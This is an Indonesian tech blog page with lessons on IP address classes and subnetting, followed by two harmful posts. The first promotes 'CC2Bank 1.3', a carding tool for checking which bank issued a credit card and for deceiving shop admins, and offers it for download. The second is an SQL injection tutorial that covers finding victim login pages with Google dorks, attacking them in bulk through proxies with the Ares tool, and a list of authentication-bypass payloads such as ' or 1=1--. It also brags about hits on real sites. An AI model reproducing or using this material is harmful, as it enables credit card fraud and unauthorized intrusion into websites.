Ilustrasi IP Addres dalam desimal dan biner dapat dilihat pada gambar 1 berikut :

IP Address dapat dipisahkan menjadi 2 bagian, yakni bagian network (bit-bit network/network bit) dan bagian host (bit-bit host/host bit). Bit network berperan dalam identifikasi suatu network dari network yang lain, sedangkan bit host berperan dalam identifikasi host dalam suatu network. Jadi, seluruh host yang tersambung dalam jaringan yang sama memiliki bit network yang sama. Sebagian dari bit-bit bagian awal dari IP Address merupakan network bit/network number, sedangkan sisanya untuk host. Garis pemisah antara bagian network dan host tidak tetap, bergantung kepada kelas network.


Ada 3 kelas address yang utama dalam TCP/IP, yakni kelas A, kelas B dan kelas C. Perangkat lunak Internet Protocol menentukan pembagian jenis kelas ini dengan menguji beberapa bit pertama dari IP Address. Penentuan kelas ini dilakukan dengan cara berikut : ·

* Jika bit pertama dari IP Address adalah 0, address merupakan network kelas A. Bit ini dan 7 bit berikutnya (8 bit pertama) merupakan bit network sedangkan 24 bit terakhir merupakan bit host. Dengan demikian hanya ada 128 network kelas A, yakni dari nomor 0.xxx.xxx.xxx sampai 127.xxx.xxx.xxx, tetapi setiap network dapat menampung lebih dari 16 juta (2563) host (xxx adalah variabel, nilainya dari 0 s/d 255). Ilustrasinya dapat dilihat pada gambar 2 berikut.


* Jika 2 bit pertama dari IP Address adalah 10, address merupakan network kelas B. Dua bit ini dan 14 bit berikutnya (16 bit pertama) merupakan bit network sedangkan 16 bit terakhir merupakan bit host. Dengan demikian terdapat lebih dari 16 ribu network kelas B (64 x 256), yakni dari network 128.0.xxx.xxx - 191.255.xxx.xxx. Setiap network kelas B mampu menampung lebih dari 65 ribu host (2562)
* Jika 3 bit pertama dari IP Address adalah 110, address merupakan network kelas C. Tiga bit ini dan 21 bit berikutnya (24 bit pertama) merupakan bit network sedangkan 8 bit terakhir merupakan bit host. Dengan demikian terdapat lebih dari 2 juta network kelas C (32 x 256 x 256), yakni dari nomor 192.0.0.xxx sampai 223.255.255.xxx. Setiap network kelas C hanya mampu menampung sekitar 256 host.


Selain ke tiga kelas di atas, ada 2 kelas lagi yang ditujukan untuk pemakaian khusus, yakni kelas D dan kelas E. Jika 4 bit pertama adalah 1110, IP Address merupakan kelas D yang digunakan untuk multicast address, yakni sejumlah komputer yang memakai bersama suatu aplikasi (bedakan dengan pengertian network address yang mengacu kepada sejumlah komputer yang memakai bersama suatu network). Salah satu penggunaan multicast address yang sedang berkembang saat ini di Internet adalah untuk aplikasi real-time video conference yang melibatkan lebih dari dua host (multipoint), menggunakan Multicast Backbone (MBone). Kelas terakhir adalah kelas E (4 bit pertama adalah 1111 atau sisa dari seluruh kelas). Pemakaiannya dicadangkan untuk kegiatan eksperimental.

Jenis kelas address yang diberikan oleh kooordinator IP Address bergantung kepada kebutuhan instansi yang meminta, yakni jumlah host yang akan diintegrasikan dalam network dan rencana pengembangan untuk beberapa tahun mendatang. Untuk perusahaan, kantor pemerintah atau universitas besar yang memiliki puluhan ribu komputer dan sangat berpotensi untuk tumbuh menjadi jutaan komputer, koordinator IP Address akan mempertimbangkan untuk memberikan kelas A. Contoh IP Address kelas A yang dipakai di Internet adalah untuk amatir paket radio seluruh dunia, mendapat IP nomor 44.xxx.xxx.xxx. Untuk kelas B, contohnya adalah nomor 167.205.xxx.xxx yang dialokasikan untuk ITB dan jaringan yang terkait ke ITB dibawah koordinator Onno W. Purbo.

Address Khusus

Selain address yang dipergunakan untuk pengenal host, ada beberapa jenis address yang digunakan untuk keperluan khusus dan tidak boleh digunakan untuk pengenal host. Address tersebut adalah :

* Network Address
Address ini digunakan untuk mengenali suatu network pada jaringan Internet. Misalkan untuk host dengan IP Address kelas B 167.205.9.35. Tanpa memakai subnet, network address dari host ini adalah 167.205.0.0. Address ini didapat dengan membuat seluruh bit host pada 2 segmen terakhir menjadi 0. Tujuannya adalah untuk menyederhanakan informasi routing pada Internet. Router cukup melihat network address (167.205) untuk menentukan kemana paket tersebut harus dikirimkan. Contoh untuk kelas C, network address untuk IP address 202.152.1.250 adalah 202.152.1.0. Analogi yang baik untuk menjelaskan fungsi network address ini adalah dalam pengolahan surat pada kantor pos. Petugas penyortir surat pada kantor pos cukup melihat kota tujuan pada alamat surat (tidak perlu membaca seluruh alamat) untuk menentukan jalur mana yang harus ditempuh surat tersebut. Pekerjaan “routing” surat-surat menjadi lebih cepat. Demikian juga halnya dengan router di Internet pada saat melakukan routing atas paket-paket data.

* Broadcast Address

Address ini digunakan untuk mengirim/menerima informasi yang harus diketahui oleh seluruh host yang ada pada suatu network. Seperti diketahui, setiap paket IP memiliki header alamat tujuan berupa IP Address dari host yang akan dituju oleh paket tersebut. Dengan adanya alamat ini, maka hanya host tujuan saja yang memproses paket tersebut, sedangkan host lain akan mengabaikannya. Bagaimana jika suatu host ingin mengirim paket kepada seluruh host yang ada pada networknya ? Tidak efisien jika ia harus membuat replikasi paket sebanyak jumlah host tujuan. Pemakaian bandwidth akan meningkat dan beban kerja host pengirim bertambah, padahal isi paket-paket tersebut sama. Oleh karena itu, dibuat konsep broadcast address. Host cukup mengirim ke alamat broadcast, maka seluruh host yang ada pada network akan menerima paket tersebut. Konsekuensinya, seluruh host pada network yang sama harus memiliki address broadcast yang sama dan address tersebut tidak boleh digunakan sebagai IP Address untuk host tertentu. Jadi, sebenarnya setiap host memiliki 2 address untuk menerima paket : pertama adalah IP Addressnya yang bersifat unik dan kedua adalah broadcast address pada network tempat host tersebut berada. Address broadcast diperoleh dengan membuat seluruh bit host pada IP Address menjadi 1. Jadi, untuk host dengan IP address 167.205.9.35 atau 167.205.240.2, broadcast addressnya adalah 167.205.255.255 (2 segmen terakhir dari IP Address tersebut dibuat berharga 11111111.11111111, sehingga secara desimal terbaca 255.255). Jenis informasi yang dibroadcast biasanya adalah informasi routing.

* Netmask

Adalah address yang digunakan untuk melakukan masking / filter pada proses pembentukan routing supaya kita cukup memperhatikan beberapa bit saja dari total 32 bit IP Address. Artinya dengan menggunakan netmask tidak perlu kita memperhatikan seluruh (32 bit) IP address untuk menentukan routing, akan tetapi cukup beberapa buah saja dari IP address yg kita perlu perhatikan untuk menentukan kemana packet tersebut dikirim.

Kaitan antara host address, network address, broadcast address & network mask sangat erat sekali - semua dapat dihitung dengan mudah jika kita cukup paham mengenai bilangan Biner. Jika kita ingin secara serius mengoperasikan sebuah jaringan komputer menggunakan teknologi TCP/IP & Internet, adalah mutlak bagi kita untuk menguasai konsep IP address tersebut. Konsep IP address sangat penting artinya bagi routing jaringan Internet. Kemampuan untuk membagi jaringan dalam subnet IP address penting artinya untuk memperoleh routing yang sangat effisien & tidak membebani router-router yang ada di Internet. Mudah-mudahan tulisan awal ini dapat membuka sedikit tentang teknologi / konsep yang ada di dalam Internet.

Sumber : Aulia K. Arif & Onno W. Purbo

(diambil dari forum mikrotik)

Read More..
Category:   Leave a Comment
Konsep Subnetting

Subnetting adalah termasuk materi yang banyak keluar di ujian CCNA dengan berbagai variasi soal. Juga menjadi momok bagi student atau instruktur yang sedang menyelesaikan kurikulum CCNA 1 program CNAP (Cisco Networking Academy Program). Untuk menjelaskan tentang subnetting, saya biasanya menggunakan beberapa ilustrasi dan analogi yang sudah kita kenal di sekitar kita. Artikel ini sengaja saya tulis untuk rekan-rekan yang sedang belajar jaringan, yang mempersiapkan diri mengikuti ujian CCNA, dan yang sedang mengikuti pelatihan CCNA 1.Setelah selesai membaca ini, silakan lanjutkan dengan artikel Penghitungan Subnetting, Siapa Takut?.

Sebenarnya subnetting itu apa dan kenapa harus dilakukan? Pertanyaan ini bisa dijawab dengan analogi sebuah jalan. Jalan bernama Gatot Subroto terdiri dari beberapa rumah bernomor 01-08, dengan rumah nomor 08 adalah rumah Ketua RT yang memiliki tugas mengumumkan informasi apapun kepada seluruh rumah di wilayah Jl. Gatot Subroto.
Ketika rumah di wilayah itu makin banyak, tentu kemungkinan menimbulkan keruwetan dan kemacetan. Karena itulah kemudian diadakan pengaturan lagi, dibuat gang-gang, rumah yang masuk ke gang diberi nomor rumah baru, masing-masing gang ada Ketua RTnya sendiri-sendiri. Sehingga ini akan memecahkan kemacetan, efiesiensi dan optimalisasi transportasi, serta setiap gang memiliki previledge sendiri-sendiri dalam mengelola wilayahnya. Jadilah gambar wilayah baru seperti di bawah:
Terus apa itu SUBNET MASK? Subnetmask digunakan untuk membaca bagaimana kita membagi jalan dan gang, atau membagi network dan hostnya. Address mana saja yang berfungsi sebagai SUBNET, mana yang HOST dan mana yang BROADCAST. Semua itu bisa kita ketahui dari SUBNET MASKnya. Jl Gatot Subroto tanpa gang yang saya tampilkan di awal bisa dipahami sebagai menggunakan SUBNET MASK DEFAULT, atau dengan kata lain bisa disebut juga bahwa Network tersebut tidak memiliki subnet (Jalan tanpa Gang). SUBNET MASK DEFAULT ini untuk masing-masing Class IP Address adalah sbb:


Sumber: RSW-Net

Read More..
Category:   Leave a Comment
CC2Bank 1.3



Tool ni bermanfaat untuk mengecek asal bank credit card,busy phone yg berfungsi untuk mengelabuhi shop admin jika mereka mengontak kita telphone dalam keadaan sibuk.Zip code yang berfungsiuntuk mengetahui daerah manakah zip code misal 79606 kita tinggal copas aja nanti akan ada keterangna yang berhubungan dengan zip code tersebut.

Dan masih banyak lagi kegunaanya hampir setiap carder dulunya menggunakan tool ini untuk melancarkan aksinya.Too ini dapat di donlot disini

Read More..
Category:   10 Comments
SQL injection Basic Tutorial

SQL injection Basic Tutorial

One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works

If you are interested in this topic we have many articles related to SQL Injection also if you would like help with the topic
you can ask in our information security forum where thousands of members can help you.

SEARCH:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question

WHAT I DO :
first let me go into details on how i go about my research
i have gathered plenty of injection strings for quite some time like these below and have just been granted access to a test machine and will be testing for many variations and new inputs...legally cool...provided by my good friend Gsecur aka ICE..also an Astal member.. http://governmentsecurity.org "thanks mate" .. gives me a chance to concentrate on what am doing and not be looking over my shoulder

INJECTION STRINGS:HOW ?

this is the easiest part...very simple

on the login page just enter something like

user:admin (you dont even have to put this.)
pass:' or 1=1--

or

user:' or 1=1--
admin:' or 1=1--

some sites will have just a password so

password:' or 1=1--

infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used

there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper

the one am interested in are quick access to targets

PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??

combo example:

admin:' or a=a--
admin:' or 1=1--

and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string

now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search

17,000 possible targets trying various searches spews out plent more


now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me

i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...

sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs

am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.

there you go you should have access to your vulnerable target by now

another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes

user=' or 1=1-- just as quick as login process


(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

good luck

Read More..
Category:   Leave a Comment
About Me


Sekedar berbagi pengalaman dan pengetahuan tentang dunia IT, banyak sekali sekarang yang sudah mengenal teknologi khususnya Internet.Tapi untuk di Indonesia khususnya di pedesaan internet sangat jarang.Masih bisa mereka di bilang gaptek.Belum semua desa terpenuhi akan layanan internet karena fasilitas yang kurang memadai.untuk itu saya mengajak teman-teman sesama bloger untuk memberikan pengarahan,latihan,pembelajaran da apapaun yang berbau tekhnologi agar Indonesia dapat mengejar ketertinggalanya.Karena harus diakui perkembangan teknologi dunia sudah sangat berkembang.

Kita mulai dengan mengajari tetangga,adik,kaka agar mereka mengenal tentang dunia internet dan ajarkan mulai dari hal-hal yang kecil.Karena dari hal-hal yang kecil akan memberikan hal yg sangat bermanfaat bagi negara kita .Semoga teman-teman sesama bloger dapat mebagi ilmu.


ILMU TIDAK AKAN DIBAWA MATI SAMA HALNYA SEPERTI HARTA
BERSEDAKHLAH ILMU JIKA KALIAN TIDAK MAMPU BERSEDEK
AH HARTA


salam hangat

K4kar0to


Read More..